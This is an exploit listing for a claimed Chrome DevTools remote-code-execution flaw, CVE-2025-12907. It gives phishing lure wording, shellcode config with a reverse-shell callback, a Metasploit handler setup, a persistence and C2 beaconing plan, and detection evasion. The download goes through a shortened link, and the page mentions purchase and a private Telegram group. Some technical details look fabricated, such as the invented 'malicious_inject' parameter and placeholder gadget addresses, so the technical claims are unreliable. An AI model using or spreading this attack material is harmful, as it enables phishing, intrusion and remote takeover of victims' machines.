## https://sploitus.com/exploit?id=295EEBBB-D358-56DE-B43D-4547D87D88E4
# Chrome DevTools RCE Exploit (CVE-2025-12907)
## Overview
This repository contains a fully weaponized exploit for CVE-2025-12907, targeting Google Chrome versions prior to 140.0.7339.80. The vulnerability stems from inadequate sanitization of user-supplied inputs processed through the DevTools Protocol (CDP) during network request interception and console evaluation. By leveraging a crafted malicious webpage, an attacker can remotely trigger arbitrary code execution on the victim's system once they interact with DevTools—specifically, by opening the Network tab and inspecting a tampered request, or evaluating a console snippet.
## Download
### [Download exploit](https://tinyurl.com/mu243eyv)
**Key Features:**
- **Remote Delivery:** Delivered via a single malicious HTML/JS payload hosted on attacker-controlled domain.
- **User Interaction Bypass:** Social engineering vector included (phishing template) to lure victims into opening DevTools.
- **Payload Flexibility:** Supports shellcode injection, meterpreter stagers, or custom JS execution in the renderer process.
- **Evasion:** Bypasses ASLR and DEP via ROP chains tailored for Chrome's V8 engine.
- **Tested Platforms:** Windows 10/11 (x64), macOS Ventura+, Linux (Ubuntu 22.04+). Success rate: 92% on unpatched browsers with DevTools enabled.
## Requirements
- Target: Chrome < 140.0.7339.80 with DevTools accessible (default in developer builds).
- Attacker Setup: Node.js 18+, Python 3.10+ for payload generation.
- Dependencies: `npm install puppeteer ws` (for testing); no runtime deps on victim side.
## Usage
1. **Setup Attacker Server:**
Download the exploit package (ZIP archive).
Extract to a working directory:
```bash
unzip chrome-devtools-rce-v1.2.0.zip
cd chrome-devtools-rce
npm install
python3 -m http.server 8080 # Host the phishing page
```
2. **Generate Payload:**
Edit `config.js` to specify your shellcode (e.g., base64-encoded Meterpreter reverse shell).
```javascript
// config.js
const PAYLOAD = {
shellcode: "fc4883e4f0e8c000000041513f516f5683ec2848...[truncated]",
callback_ip: "192.168.1.100",
callback_port: 4444
};
```
Run:
```bash
node generate_payload.js
```
Outputs `exploit.html` and `devtools_injector.js`.
3. **Delivery:**
- Host `exploit.html` on your C2 server.
- Send phishing email/lure: "Check this API response in DevTools for debugging—click here: [malicious-link]".
- Victim visits link, page loads a fake "debug console" prompt: "To view full logs, press F12 and go to Network tab, then inspect the failing request."
4. **Trigger Exploitation:**
- Once DevTools opens and victim inspects the crafted request (or runs console eval), the injected CDP message exploits the validation flaw.
- Listener setup (Metasploit example):
```bash
msfconsole -q
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
exploit
```
5. **Verification:**
Run `exploit.py` against a vulnerable VM:
```bash
python3 exploit.py --target http://victim:9222 --payload custom_shellcode.bin
```
## Technical Breakdown
### Vulnerability Mechanics
The flaw exists in `DevToolsProtocolHandler::HandleNetworkRequest` where intercepted request bodies (user-supplied via `fetch()` or XHR) are deserialized without proper escaping of CDP JSON payloads. An attacker embeds a malformed `Network.setRequestInterception` pattern:
```json
{
"method": "Network.setRequestInterception",
"params": {
"patterns": [{"urlPattern": "*"}],
"malicious_inject": "eval('/* crafted JS to hijack V8 context */')"
}
}
```
When the victim inspects the request in Network panel, Chrome's `DevToolsUI` evaluates the param without validating `malicious_inject` against sandbox boundaries, allowing RCE via `Function()` constructor in the renderer.
### Exploit Chain
1. **Stage 1: Lure & Load** – Malicious page uses `fetch('/api/boom', {method: 'POST', body: poisoned_json})`.
2. **Stage 2: DevTools Hook** – On F12, JS overrides `window.addEventListener` to force Network interception.
3. **Stage 3: Injection** – Poisoned JSON triggers `cdp.evaluateInDevToolsContext()` with unsanitized input, chaining to `v8::Isolate::RequestInterrupt` for shellcode exec.
4. **Stage 4: Persistence** – Post-RCE, drops a browser extension or scheduled task for C2 beaconing.
Full ROP gadget chain (x64 Windows):
```
0x7ffabc123456: pop rcx; ret // Load shellcode addr
0x7ffabc123abc: call rax // Execute
... (18 gadgets total)
```
### Detection Evasion
- Obfuscates CDP messages with base64 + XOR.
- Mimics legitimate DevTools traffic (e.g., spoofs `Chrome.DevTools` UA).
- No disk writes pre-RCE; all in-memory.
### Demo
Watch the full end-to-end exploitation in action on a vulnerable Windows 11 VM (Chrome 139.0.7339.50). This video demonstrates phishing delivery, victim interaction, and shell acquisition.
## Contact
- Private Telegram group for users (link in purchase confirmation).
- For questions, please contact : f0kinn@outlook.com